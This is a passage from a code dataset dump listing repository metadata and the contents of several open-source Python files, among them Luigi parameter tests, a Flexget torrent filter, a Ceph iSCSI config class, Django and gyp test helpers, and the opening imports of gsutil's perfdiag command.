repo_name
stringlengths
5
100
ref
stringlengths
12
67
path
stringlengths
4
244
copies
stringlengths
1
8
content
stringlengths
0
1.05M
realgo/luigi
refs/heads/master
test/parameter_test.py
3
# -*- coding: utf-8 -*- # # Copyright 2012-2015 Spotify AB # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import datetime from helpers import with_config, LuigiTestCase, parsing, in_parse, RunOnceTask from datetime import timedelta import luigi import luigi.date_interval import luigi.interface import luigi.notifications from luigi.mock import MockTarget from luigi.parameter import ParameterException from worker_test import email_patch luigi.notifications.DEBUG = True class A(luigi.Task): p = luigi.IntParameter() class WithDefault(luigi.Task): x = luigi.Parameter(default='xyz') class WithDefaultTrue(luigi.Task): x = luigi.BoolParameter(default=True) class Foo(luigi.Task): bar = luigi.Parameter() p2 = luigi.IntParameter() not_a_param = "lol" class Baz(luigi.Task): bool = luigi.BoolParameter() def run(self): Baz._val = self.bool class ForgotParam(luigi.Task): param = luigi.Parameter() def run(self): pass class ForgotParamDep(luigi.Task): def requires(self): return ForgotParam() def run(self): pass class BananaDep(luigi.Task): x = luigi.Parameter() y = luigi.Parameter(default='def') def output(self): return MockTarget('banana-dep-%s-%s' % (self.x, self.y)) def run(self): self.output().open('w').close() class Banana(luigi.Task): x = luigi.Parameter() y = luigi.Parameter() style = luigi.Parameter(default=None) def requires(self): if self.style is None: return BananaDep() # will fail elif self.style == 'x-arg': return BananaDep(self.x) elif self.style == 'y-kwarg': return BananaDep(y=self.y) elif self.style == 'x-arg-y-arg': return BananaDep(self.x, self.y) else: raise Exception('unknown style') def output(self): return MockTarget('banana-%s-%s' % (self.x, self.y)) def run(self): self.output().open('w').close() class MyConfig(luigi.Config): mc_p = luigi.IntParameter() mc_q = luigi.IntParameter(default=73) class MyConfigWithoutSection(luigi.Config): use_cmdline_section = False mc_r = luigi.IntParameter() mc_s = luigi.IntParameter(default=99) class NoopTask(luigi.Task): pass def _value(parameter): """ A hackish way to get the "value" of a parameter. Previously Parameter exposed ``param_obj._value``. This is replacement for that so I don't need to rewrite all test cases. """ class DummyLuigiTask(luigi.Task): param = parameter return DummyLuigiTask().param class ParameterTest(LuigiTestCase): def test_default_param(self): self.assertEqual(WithDefault().x, 'xyz') def test_missing_param(self): def create_a(): return A() self.assertRaises(luigi.parameter.MissingParameterException, create_a) def test_unknown_param(self): def create_a(): return A(p=5, q=4) self.assertRaises(luigi.parameter.UnknownParameterException, create_a) def test_unknown_param_2(self): def create_a(): return A(1, 2, 3) self.assertRaises(luigi.parameter.UnknownParameterException, create_a) def test_duplicated_param(self): def create_a(): return A(5, p=7) self.assertRaises(luigi.parameter.DuplicateParameterException, create_a) def test_parameter_registration(self): self.assertEqual(len(Foo.get_params()), 2) def test_task_creation(self): f = Foo("barval", p2=5) self.assertEqual(len(f.get_params()), 2) self.assertEqual(f.bar, "barval") self.assertEqual(f.p2, 5) self.assertEqual(f.not_a_param, "lol") def test_bool_false(self): self.run_locally(['Baz']) self.assertEqual(Baz._val, False) def test_bool_true(self): self.run_locally(['Baz', '--bool']) self.assertEqual(Baz._val, True) def test_bool_default_true(self): self.assertTrue(WithDefaultTrue().x) def test_forgot_param(self): self.assertRaises(luigi.parameter.MissingParameterException, self.run_locally, ['ForgotParam'],) @email_patch def test_forgot_param_in_dep(self, emails): # A programmatic missing parameter will cause an error email to be sent self.run_locally(['ForgotParamDep']) self.assertNotEqual(emails, []) def test_default_param_cmdline(self): self.assertEqual(WithDefault().x, 'xyz') def test_default_param_cmdline_2(self): self.assertEqual(WithDefault().x, 'xyz') def test_insignificant_parameter(self): class InsignificantParameterTask(luigi.Task): foo = luigi.Parameter(significant=False, default='foo_default') bar = luigi.Parameter() t1 = InsignificantParameterTask(foo='x', bar='y') self.assertEqual(t1.task_id, 'InsignificantParameterTask(bar=y)') t2 = InsignificantParameterTask('u', 'z') self.assertEqual(t2.foo, 'u') self.assertEqual(t2.bar, 'z') self.assertEqual(t2.task_id, 'InsignificantParameterTask(bar=z)') def test_local_significant_param(self): """ Obviously, if anything should be positional, so should local significant parameters """ class MyTask(luigi.Task): # This could typically be "--label-company=disney" x = luigi.Parameter(significant=True) MyTask('arg') self.assertRaises(luigi.parameter.MissingParameterException, lambda: MyTask()) def test_local_insignificant_param(self): """ Ensure we have the same behavior as in before a78338c """ class MyTask(luigi.Task): # This could typically be "--num-threads=True" x = luigi.Parameter(significant=False) MyTask('arg') self.assertRaises(luigi.parameter.MissingParameterException, lambda: MyTask()) def test_nonpositional_param(self): """ Ensure we have the same behavior as in before a78338c """ class MyTask(luigi.Task): # This could typically be "--num-threads=True" x = luigi.Parameter(significant=False, positional=False) MyTask(x='arg') self.assertRaises(luigi.parameter.UnknownParameterException, lambda: MyTask('arg')) class TestNewStyleGlobalParameters(LuigiTestCase): def setUp(self): super(TestNewStyleGlobalParameters, self).setUp() MockTarget.fs.clear() def expect_keys(self, expected): self.assertEqual(set(MockTarget.fs.get_all_data().keys()), set(expected)) def test_x_arg(self): self.run_locally(['Banana', '--x', 'foo', '--y', 'bar', '--style', 'x-arg']) self.expect_keys(['banana-foo-bar', 'banana-dep-foo-def']) def test_x_arg_override(self): self.run_locally(['Banana', '--x', 'foo', '--y', 'bar', '--style', 'x-arg', '--BananaDep-y', 'xyz']) self.expect_keys(['banana-foo-bar', 'banana-dep-foo-xyz']) def test_x_arg_override_stupid(self): self.run_locally(['Banana', '--x', 'foo', '--y', 'bar', '--style', 'x-arg', '--BananaDep-x', 'blabla']) self.expect_keys(['banana-foo-bar', 'banana-dep-foo-def']) def test_x_arg_y_arg(self): self.run_locally(['Banana', '--x', 'foo', '--y', 'bar', '--style', 'x-arg-y-arg']) self.expect_keys(['banana-foo-bar', 'banana-dep-foo-bar']) def test_x_arg_y_arg_override(self): self.run_locally(['Banana', '--x', 'foo', '--y', 'bar', '--style', 'x-arg-y-arg', '--BananaDep-y', 'xyz']) self.expect_keys(['banana-foo-bar', 'banana-dep-foo-bar']) def test_x_arg_y_arg_override_all(self): self.run_locally(['Banana', '--x', 'foo', '--y', 'bar', '--style', 'x-arg-y-arg', '--BananaDep-y', 'xyz', '--BananaDep-x', 'blabla']) self.expect_keys(['banana-foo-bar', 'banana-dep-foo-bar']) def test_y_arg_override(self): self.run_locally(['Banana', '--x', 'foo', '--y', 'bar', '--style', 'y-kwarg', '--BananaDep-x', 'xyz']) self.expect_keys(['banana-foo-bar', 'banana-dep-xyz-bar']) def test_y_arg_override_both(self): self.run_locally(['Banana', '--x', 'foo', '--y', 'bar', '--style', 'y-kwarg', '--BananaDep-x', 'xyz', '--BananaDep-y', 'blah']) self.expect_keys(['banana-foo-bar', 'banana-dep-xyz-bar']) def test_y_arg_override_banana(self): self.run_locally(['Banana', '--y', 'bar', '--style', 'y-kwarg', '--BananaDep-x', 'xyz', '--Banana-x', 'baz']) self.expect_keys(['banana-baz-bar', 'banana-dep-xyz-bar']) class TestRemoveGlobalParameters(LuigiTestCase): def run_and_check(self, args): run_exit_status = self.run_locally(args) self.assertTrue(run_exit_status) return run_exit_status @parsing(['--MyConfig-mc-p', '99', '--mc-r', '55', 'NoopTask']) def test_use_config_class_1(self): self.assertEqual(MyConfig().mc_p, 99) self.assertEqual(MyConfig().mc_q, 73) self.assertEqual(MyConfigWithoutSection().mc_r, 55) self.assertEqual(MyConfigWithoutSection().mc_s, 99) @parsing(['NoopTask', '--MyConfig-mc-p', '99', '--mc-r', '55']) def test_use_config_class_2(self): self.assertEqual(MyConfig().mc_p, 99) self.assertEqual(MyConfig().mc_q, 73) self.assertEqual(MyConfigWithoutSection().mc_r, 55) self.assertEqual(MyConfigWithoutSection().mc_s, 99) @parsing(['--MyConfig-mc-p', '99', '--mc-r', '55', 'NoopTask', '--mc-s', '123', '--MyConfig-mc-q', '42']) def test_use_config_class_more_args(self): self.assertEqual(MyConfig().mc_p, 99) self.assertEqual(MyConfig().mc_q, 42) self.assertEqual(MyConfigWithoutSection().mc_r, 55) self.assertEqual(MyConfigWithoutSection().mc_s, 123) @with_config({"MyConfig": {"mc_p": "666", "mc_q": "777"}}) @parsing(['--mc-r', '555', 'NoopTask']) def test_use_config_class_with_configuration(self): self.assertEqual(MyConfig().mc_p, 666) self.assertEqual(MyConfig().mc_q, 777) self.assertEqual(MyConfigWithoutSection().mc_r, 555) self.assertEqual(MyConfigWithoutSection().mc_s, 99) @with_config({"MyConfigWithoutSection": {"mc_r": "999", "mc_s": "888"}}) @parsing(['NoopTask', '--MyConfig-mc-p', '222', '--mc-r', '555']) def test_use_config_class_with_configuration_2(self): self.assertEqual(MyConfig().mc_p, 222) self.assertEqual(MyConfig().mc_q, 73) self.assertEqual(MyConfigWithoutSection().mc_r, 555) self.assertEqual(MyConfigWithoutSection().mc_s, 888) def test_misc_1(self): class Dogs(luigi.Config): n_dogs = luigi.IntParameter() class CatsWithoutSection(luigi.Config): use_cmdline_section = False n_cats = luigi.IntParameter() with luigi.cmdline_parser.CmdlineParser.global_instance(['--n-cats', '123', '--Dogs-n-dogs', '456', 'WithDefault'], allow_override=True): self.assertEqual(Dogs().n_dogs, 456) self.assertEqual(CatsWithoutSection().n_cats, 123) with luigi.cmdline_parser.CmdlineParser.global_instance(['WithDefault', '--n-cats', '321', '--Dogs-n-dogs', '654'], allow_override=True): self.assertEqual(Dogs().n_dogs, 654) self.assertEqual(CatsWithoutSection().n_cats, 321) def test_global_significant_param(self): """ We don't want any kind of global param to be positional """ class MyTask(luigi.Task): # This could typically be called "--test-dry-run" x_g1 = luigi.Parameter(default='y', is_global=True, significant=True) self.assertRaises(luigi.parameter.UnknownParameterException, lambda: MyTask('arg')) def test_global_insignificant_param(self): """ We don't want any kind of global param to be positional """ class MyTask(luigi.Task): # This could typically be "--yarn-pool=development" x_g2 = luigi.Parameter(default='y', is_global=True, significant=False) self.assertRaises(luigi.parameter.UnknownParameterException, lambda: MyTask('arg')) class TestParamWithDefaultFromConfig(LuigiTestCase): def testNoSection(self): self.assertRaises(ParameterException, lambda: _value(luigi.Parameter(config_path=dict(section="foo", name="bar")))) @with_config({"foo": {}}) def testNoValue(self): self.assertRaises(ParameterException, lambda: _value(luigi.Parameter(config_path=dict(section="foo", name="bar")))) @with_config({"foo": {"bar": "baz"}}) def testDefault(self): class LocalA(luigi.Task): p = luigi.Parameter(config_path=dict(section="foo", name="bar")) self.assertEqual("baz", LocalA().p) self.assertEqual("boo", LocalA(p="boo").p) @with_config({"foo": {"bar": "2001-02-03T04"}}) def testDateHour(self): p = luigi.DateHourParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(datetime.datetime(2001, 2, 3, 4, 0, 0), _value(p)) @with_config({"foo": {"bar": "2001-02-03T0430"}}) def testDateMinute(self): p = luigi.DateMinuteParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(datetime.datetime(2001, 2, 3, 4, 30, 0), _value(p)) @with_config({"foo": {"bar": "2001-02-03T04H30"}}) def testDateMinuteDeprecated(self): p = luigi.DateMinuteParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(datetime.datetime(2001, 2, 3, 4, 30, 0), _value(p)) @with_config({"foo": {"bar": "2001-02-03"}}) def testDate(self): p = luigi.DateParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(datetime.date(2001, 2, 3), _value(p)) @with_config({"foo": {"bar": "2015-07"}}) def testMonthParameter(self): p = luigi.MonthParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(datetime.date(2015, 7, 1), _value(p)) @with_config({"foo": {"bar": "2015"}}) def testYearParameter(self): p = luigi.YearParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(datetime.date(2015, 1, 1), _value(p)) @with_config({"foo": {"bar": "123"}}) def testInt(self): p = luigi.IntParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(123, _value(p)) @with_config({"foo": {"bar": "true"}}) def testBool(self): p = luigi.BoolParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(True, _value(p)) @with_config({"foo": {"bar": "false"}}) def testBoolConfigOutranksDefault(self): p = luigi.BoolParameter(default=True, config_path=dict(section="foo", name="bar")) self.assertEqual(False, _value(p)) @with_config({"foo": {"bar": "2001-02-03-2001-02-28"}}) def testDateInterval(self): p = luigi.DateIntervalParameter(config_path=dict(section="foo", name="bar")) expected = luigi.date_interval.Custom.parse("2001-02-03-2001-02-28") self.assertEqual(expected, _value(p)) @with_config({"foo": {"bar": "1 day"}}) def testTimeDelta(self): p = luigi.TimeDeltaParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(timedelta(days=1), _value(p)) @with_config({"foo": {"bar": "2 seconds"}}) def testTimeDeltaPlural(self): p = luigi.TimeDeltaParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(timedelta(seconds=2), _value(p)) @with_config({"foo": {"bar": "3w 4h 5m"}}) def testTimeDeltaMultiple(self): p = luigi.TimeDeltaParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(timedelta(weeks=3, hours=4, minutes=5), _value(p)) @with_config({"foo": {"bar": "P4DT12H30M5S"}}) def testTimeDelta8601(self): p = luigi.TimeDeltaParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(timedelta(days=4, hours=12, minutes=30, seconds=5), _value(p)) @with_config({"foo": {"bar": "P5D"}}) def testTimeDelta8601NoTimeComponent(self): p = luigi.TimeDeltaParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(timedelta(days=5), _value(p)) @with_config({"foo": {"bar": "P5W"}}) def testTimeDelta8601Weeks(self): p = luigi.TimeDeltaParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(timedelta(weeks=5), _value(p)) @with_config({"foo": {"bar": "P3Y6M4DT12H30M5S"}}) def testTimeDelta8601YearMonthNotSupported(self): def f(): return _value(luigi.TimeDeltaParameter(config_path=dict(section="foo", name="bar"))) self.assertRaises(luigi.parameter.ParameterException, f) # ISO 8601 durations with years or months are not supported @with_config({"foo": {"bar": "PT6M"}}) def testTimeDelta8601MAfterT(self): p = luigi.TimeDeltaParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(timedelta(minutes=6), _value(p)) @with_config({"foo": {"bar": "P6M"}}) def testTimeDelta8601MBeforeT(self): def f(): return _value(luigi.TimeDeltaParameter(config_path=dict(section="foo", name="bar"))) self.assertRaises(luigi.parameter.ParameterException, f) # ISO 8601 durations with months are not supported def testHasDefaultNoSection(self): self.assertRaises(luigi.parameter.MissingParameterException, lambda: _value(luigi.Parameter(config_path=dict(section="foo", name="bar")))) @with_config({"foo": {}}) def testHasDefaultNoValue(self): self.assertRaises(luigi.parameter.MissingParameterException, lambda: _value(luigi.Parameter(config_path=dict(section="foo", name="bar")))) @with_config({"foo": {"bar": "baz"}}) def testHasDefaultWithBoth(self): self.assertTrue(_value(luigi.Parameter(config_path=dict(section="foo", name="bar")))) @with_config({"foo": {"bar": "baz"}}) def testWithDefault(self): p = luigi.Parameter(config_path=dict(section="foo", name="bar"), default='blah') self.assertEqual('baz', _value(p)) # config overrides default def testWithDefaultAndMissing(self): p = luigi.Parameter(config_path=dict(section="foo", name="bar"), default='blah') self.assertEqual('blah', _value(p)) @with_config({"LocalA": {"p": "p_default"}}) def testDefaultFromTaskName(self): class LocalA(luigi.Task): p = luigi.Parameter() self.assertEqual("p_default", LocalA().p) self.assertEqual("boo", LocalA(p="boo").p) @with_config({"LocalA": {"p": "999"}}) def testDefaultFromTaskNameInt(self): class LocalA(luigi.Task): p = luigi.IntParameter() self.assertEqual(999, LocalA().p) self.assertEqual(777, LocalA(p=777).p) @with_config({"LocalA": {"p": "p_default"}, "foo": {"bar": "baz"}}) def testDefaultFromConfigWithTaskNameToo(self): class LocalA(luigi.Task): p = luigi.Parameter(config_path=dict(section="foo", name="bar")) self.assertEqual("p_default", LocalA().p) self.assertEqual("boo", LocalA(p="boo").p) @with_config({"LocalA": {"p": "p_default_2"}}) def testDefaultFromTaskNameWithDefault(self): class LocalA(luigi.Task): p = luigi.Parameter(default="banana") self.assertEqual("p_default_2", LocalA().p) self.assertEqual("boo_2", LocalA(p="boo_2").p) @with_config({"MyClass": {"p_wohoo": "p_default_3"}}) def testWithLongParameterName(self): class MyClass(luigi.Task): p_wohoo = luigi.Parameter(default="banana") self.assertEqual("p_default_3", MyClass().p_wohoo) self.assertEqual("boo_2", MyClass(p_wohoo="boo_2").p_wohoo) @with_config({"RangeDaily": {"days_back": "123"}}) def testSettingOtherMember(self): class LocalA(luigi.Task): pass self.assertEqual(123, luigi.tools.range.RangeDaily(of=LocalA).days_back) self.assertEqual(70, luigi.tools.range.RangeDaily(of=LocalA, days_back=70).days_back) @with_config({"MyClass": {"p_not_global": "123"}}) def testCommandLineWithDefault(self): """ Verify that we also read from the config when we build tasks from the command line parsers. """ class MyClass(luigi.Task): p_not_global = luigi.Parameter(default='banana') def complete(self): import sys luigi.configuration.get_config().write(sys.stdout) if self.p_not_global != "123": raise ValueError("The parameter didn't get set!!") return True def run(self): pass self.assertTrue(self.run_locally(['MyClass'])) self.assertFalse(self.run_locally(['MyClass', '--p-not-global', '124'])) self.assertFalse(self.run_locally(['MyClass', '--MyClass-p-not-global', '124'])) @with_config({"MyClass2": {"p_not_global_no_default": "123"}}) def testCommandLineNoDefault(self): """ Verify that we also read from the config when we build tasks from the command line parsers. """ class MyClass2(luigi.Task): """ TODO: Make luigi clean it's register for tests. Hate this 2 dance. """ p_not_global_no_default = luigi.Parameter() def complete(self): import sys luigi.configuration.get_config().write(sys.stdout) luigi.configuration.get_config().write(sys.stdout) if self.p_not_global_no_default != "123": raise ValueError("The parameter didn't get set!!") return True def run(self): pass self.assertTrue(self.run_locally(['MyClass2'])) self.assertFalse(self.run_locally(['MyClass2', '--p-not-global-no-default', '124'])) self.assertFalse(self.run_locally(['MyClass2', '--MyClass2-p-not-global-no-default', '124'])) @with_config({"mynamespace.A": {"p": "999"}}) def testWithNamespaceConfig(self): class A(luigi.Task): task_namespace = 'mynamespace' p = luigi.IntParameter() self.assertEqual(999, A().p) self.assertEqual(777, A(p=777).p) def testWithNamespaceCli(self): class A(luigi.Task): task_namespace = 'mynamespace' p = luigi.IntParameter(default=100) expected = luigi.IntParameter() def complete(self): if self.p != self.expected: raise ValueError return True self.assertTrue(self.run_locally_split('mynamespace.A --expected 100')) # TODO(arash): Why is `--p 200` hanging with multiprocessing stuff? # self.assertTrue(self.run_locally_split('mynamespace.A --p 200 --expected 200')) self.assertTrue(self.run_locally_split('mynamespace.A --mynamespace.A-p 200 --expected 200')) self.assertFalse(self.run_locally_split('mynamespace.A --A-p 200 --expected 200')) class OverrideEnvStuff(LuigiTestCase): @with_config({"core": {"default-scheduler-port": '6543'}}) def testOverrideSchedulerPort(self): env_params = luigi.interface.core() self.assertEqual(env_params.scheduler_port, 6543) @with_config({"core": {"scheduler-port": '6544'}}) def testOverrideSchedulerPort2(self): env_params = luigi.interface.core() self.assertEqual(env_params.scheduler_port, 6544) @with_config({"core": {"scheduler_port": '6545'}}) def testOverrideSchedulerPort3(self): env_params = luigi.interface.core() self.assertEqual(env_params.scheduler_port, 6545) class TestSerializeDateParameters(LuigiTestCase): def testSerialize(self): date = datetime.date(2013, 2, 3) self.assertEqual(luigi.DateParameter().serialize(date), '2013-02-03') self.assertEqual(luigi.YearParameter().serialize(date), '2013') self.assertEqual(luigi.MonthParameter().serialize(date), '2013-02') dt = datetime.datetime(2013, 2, 3, 4, 5) self.assertEqual(luigi.DateHourParameter().serialize(dt), '2013-02-03T04') class TestTaskParameter(LuigiTestCase): def testUsage(self): class MetaTask(luigi.Task): task_namespace = "mynamespace" a = luigi.TaskParameter() def run(self): self.__class__.saved_value = self.a class OtherTask(luigi.Task): task_namespace = "other_namespace" self.assertEqual(MetaTask(a=MetaTask).a, MetaTask) self.assertEqual(MetaTask(a=OtherTask).a, OtherTask) # So I first thought this "should" work, but actually it should not, # because it should not need to parse values known at run-time self.assertNotEqual(MetaTask(a="mynamespace.MetaTask").a, MetaTask) # But is should be able to parse command line arguments self.assertRaises(luigi.task_register.TaskClassNotFoundException, lambda: (self.run_locally_split('mynamespace.MetaTask --a blah'))) self.assertRaises(luigi.task_register.TaskClassNotFoundException, lambda: (self.run_locally_split('mynamespace.MetaTask --a Taskk'))) self.assertTrue(self.run_locally_split('mynamespace.MetaTask --a mynamespace.MetaTask')) self.assertEqual(MetaTask.saved_value, MetaTask) self.assertTrue(self.run_locally_split('mynamespace.MetaTask --a other_namespace.OtherTask')) self.assertEqual(MetaTask.saved_value, OtherTask) class NewStyleParameters822Test(LuigiTestCase): """ I bet these tests created at 2015-03-08 are reduntant by now (Oct 2015). But maintaining them anyway, just in case I have overlooked something. """ # See https://github.com/spotify/luigi/issues/822 def test_subclasses(self): class BarBaseClass(luigi.Task): x = luigi.Parameter(default='bar_base_default') class BarSubClass(BarBaseClass): pass in_parse(['BarSubClass', '--x', 'xyz', '--BarBaseClass-x', 'xyz'], lambda task: self.assertEqual(task.x, 'xyz')) # https://github.com/spotify/luigi/issues/822#issuecomment-77782714 in_parse(['BarBaseClass', '--BarBaseClass-x', 'xyz'], lambda task: self.assertEqual(task.x, 'xyz')) class LocalParameters1304Test(LuigiTestCase): """ It was discussed and decided that local parameters (--x) should be semantically different from global parameters (--MyTask-x). The former sets only the parsed root task, and the later sets the parameter for all the tasks. https://github.com/spotify/luigi/issues/1304#issuecomment-148402284 """ def test_local_params(self): class MyTask(RunOnceTask): param1 = luigi.IntParameter() param2 = luigi.BoolParameter(default=False) def requires(self): if self.param1 > 0: yield MyTask(param1=(self.param1 - 1)) def run(self): assert self.param1 == 1 or not self.param2 self.comp = True self.assertTrue(self.run_locally_split('MyTask --param1 1 --param2')) def test_local_takes_precedence(self): class MyTask(luigi.Task): param = luigi.IntParameter() def complete(self): return False def run(self): assert self.param == 5 self.assertTrue(self.run_locally_split('MyTask --param 5 --MyTask-param 6')) def test_local_only_affects_root(self): class MyTask(RunOnceTask): param = luigi.IntParameter(default=3) def requires(self): assert self.param != 3 if self.param == 5: yield MyTask() # It would be a cyclic dependency if local took precedence self.assertTrue(self.run_locally_split('MyTask --param 5 --MyTask-param 6')) def test_range_doesnt_propagate_args(self): """ Ensure that ``--task Range --of Blah --blah-arg 123`` doesn't work. This will of course not work unless support is explicitly added for it. But being a bit paranoid here and adding this test case so that if somebody decides to add it in the future, they'll be redircted to the dicussion in #1304 """ class Blah(RunOnceTask): date = luigi.DateParameter() blah_arg = luigi.IntParameter() # The SystemExit is assumed to be thrown by argparse self.assertRaises(SystemExit, self.run_locally_split, 'RangeDailyBase --of Blah --start 2015-01-01 --task-limit 1 --blah-arg 123') self.assertTrue(self.run_locally_split('RangeDailyBase --of Blah --start 2015-01-01 --task-limit 1 --Blah-blah-arg 123')) class TaskAsParameterName1335Test(LuigiTestCase): def test_parameter_can_be_named_task(self): class MyTask(luigi.Task): # Indeed, this is not the most realistic example, but still ... task = luigi.IntParameter() self.assertTrue(self.run_locally_split('MyTask --task 5'))
caot/intellij-community
refs/heads/master
python/testData/fillParagraph/docstringOneParagraph_after.py
83
__author__ = 'ktisha' def foo(): """ This is my docstring. There are many like it, but this one mine. My docstring is my best friend. it is my life. I must master it as I must master my life. This is my docstring. There are many like it, but this one mine. My docstring is my best friend. it is my life. I must master it as I must master my life. """
BrainDamage/Flexget
refs/heads/develop
flexget/plugins/filter/private_torrents.py
11
from __future__ import unicode_literals, division, absolute_import import logging from flexget import plugin from flexget.event import event log = logging.getLogger('priv_torrents') class FilterPrivateTorrents(object): """How to handle private torrents. private_torrents: yes|no Example:: private_torrents: no This would reject all torrent entries with private flag. Example:: private_torrents: yes This would reject all public torrents. Non-torrent content is not interviened. """ schema = {'type': 'boolean'} @plugin.priority(127) def on_task_modify(self, task, config): private_torrents = config for entry in task.accepted: if not 'torrent' in entry: log.debug('`%s` is not a torrent' % entry['title']) continue private = entry['torrent'].private if not private_torrents and private: entry.reject('torrent is marked as private', remember=True) elif private_torrents and not private: entry.reject('public torrent', remember=True) @event('plugin.register') def register_plugin(): plugin.register(FilterPrivateTorrents, 'private_torrents', api_ver=2)
pcuzner/ceph-iscsi-config
refs/heads/master
ceph_iscsi_config/gateway_object.py
1
#!/usr/bin/env python import ceph_iscsi_config.settings as settings from ceph_iscsi_config.common import Config from ceph_iscsi_config.utils import CephiSCSIError class GWObject(object): def __init__(self, cfg_type, cfg_type_key, logger, control_settings): self.control_settings = control_settings self.cfg_type = cfg_type self.cfg_type_key = cfg_type_key self.logger = logger self.config = Config(self.logger) if self.config.error: raise CephiSCSIError(self.config.error_msg) # Copy of controls that will not be written until commit is called. # To update the kernel call the child object's update function. self.controls = self._get_config_controls().copy() self._add_properies() def _set_config_controls(self, config, controls): if self.cfg_type_key: config.config[self.cfg_type][self.cfg_type_key]['controls'] = controls else: config.config['controls'] = controls def _get_config_controls(self): # global controls if self.cfg_type == 'controls': return self.config.config.get('controls', {}) # This might be the initial creation so it will not be in the # config yet if self.cfg_type_key in self.config.config[self.cfg_type]: return self.config.config[self.cfg_type][self.cfg_type_key].get('controls', {}) else: return {} def _get_control(self, key): value = self.controls.get(key, None) if value is not None: value = settings.Settings.normalize(key, value) if value is None: return getattr(settings.config, key) return value def _set_control(self, key, value): if value is None or \ settings.Settings.normalize(key, value) == getattr(settings.config, key): self.controls.pop(key, None) else: self.controls[key] = value def _add_properies(self): for k in self.control_settings: setattr(GWObject, k, property(lambda self, k=k: self._get_control(k), lambda self, v, k=k: self._set_control(k, v))) def commit_controls(self): committed_controls = self._get_config_controls() if self.controls != committed_controls: # update our config self._set_config_controls(self.config, self.controls) # update remote config if self.cfg_type == 'controls': self.config.update_item(self.cfg_type, self.cfg_type_key, self.controls) else: updated_obj = self.config.config[self.cfg_type][self.cfg_type_key] self.config.update_item(self.cfg_type, self.cfg_type_key, updated_obj) self.config.commit() if self.config.error: raise CephiSCSIError(self.config.error_msg)
yqm/sl4a
refs/heads/master
python/src/Tools/i18n/makelocalealias.py
52
#!/usr/bin/env python """ Convert the X11 locale.alias file into a mapping dictionary suitable for locale.py. Written by Marc-Andre Lemburg <mal@genix.com>, 2004-12-10. """ import locale # Location of the alias file LOCALE_ALIAS = '/usr/lib/X11/locale/locale.alias' def parse(filename): f = open(filename) lines = f.read().splitlines() data = {} for line in lines: line = line.strip() if not line: continue if line[:1] == '#': continue locale, alias = line.split() # Strip ':' if locale[-1] == ':': locale = locale[:-1] # Lower-case locale locale = locale.lower() # Ignore one letter locale mappings (except for 'c') if len(locale) == 1 and locale != 'c': continue # Normalize encoding, if given if '.' in locale: lang, encoding = locale.split('.')[:2] encoding = encoding.replace('-', '') encoding = encoding.replace('_', '') locale = lang + '.' + encoding if encoding.lower() == 'utf8': # Ignore UTF-8 mappings - this encoding should be # available for all locales continue data[locale] = alias return data def pprint(data): items = data.items() items.sort() for k,v in items: print ' %-40s%r,' % ('%r:' % k, v) def print_differences(data, olddata): items = olddata.items() items.sort() for k, v in items: if not data.has_key(k): print '# removed %r' % k elif olddata[k] != data[k]: print '# updated %r -> %r to %r' % \ (k, olddata[k], data[k]) # Additions are not mentioned if __name__ == '__main__': data = locale.locale_alias.copy() data.update(parse(LOCALE_ALIAS)) print_differences(data, locale.locale_alias) print print 'locale_alias = {' pprint(data) print '}'
jasonbot/django
refs/heads/master
django/db/backends/mysql/creation.py
193
from django.db.backends.base.creation import BaseDatabaseCreation class DatabaseCreation(BaseDatabaseCreation): def sql_table_creation_suffix(self): suffix = [] test_settings = self.connection.settings_dict['TEST'] if test_settings['CHARSET']: suffix.append('CHARACTER SET %s' % test_settings['CHARSET']) if test_settings['COLLATION']: suffix.append('COLLATE %s' % test_settings['COLLATION']) return ' '.join(suffix)
benhylau/cjdns
refs/heads/master
node_build/dependencies/libuv/build/gyp/test/win/gyptest-cl-calling-convention.py
108
#!/usr/bin/env python # Copyright (c) 2014 Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Make sure calling convention setting is extracted properly. """ import TestGyp import sys if sys.platform == 'win32': test = TestGyp.TestGyp(formats=['msvs', 'ninja']) CHDIR = 'compiler-flags' test.run_gyp('calling-convention.gyp', chdir=CHDIR) test.build('calling-convention.gyp', test.ALL, chdir=CHDIR) test.pass_test()
Allow2CEO/browser-ios
refs/heads/master
brave/node_modules/hashset-cpp/vendor/depot_tools/third_party/gsutil/gslib/commands/perfdiag.py
51
# Copyright 2012 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Contains the perfdiag gsutil command.""" import calendar from collections import defaultdict import contextlib import datetime import json import math import multiprocessing import os import re import socket import string import subprocess import tempfile import time import boto.gs.connection from gslib.command import Command from gslib.command import COMMAND_NAME from gslib.command import COMMAND_NAME_ALIASES from gslib.command import CONFIG_REQUIRED from gslib.command import FILE_URIS_OK from gslib.command import MAX_ARGS from gslib.command import MIN_ARGS from gslib.command import PROVIDER_URIS_OK from gslib.command import SUPPORTED_SUB_ARGS from gslib.command import URIS_START_ARG from gslib.commands import config from gslib.exception import CommandException from gslib.help_provider import HELP_NAME from gslib.help_provider import HELP_NAME_ALIASES from gslib.help_provider import HELP_ONE_LINE_SUMMARY from gslib.help_provider import 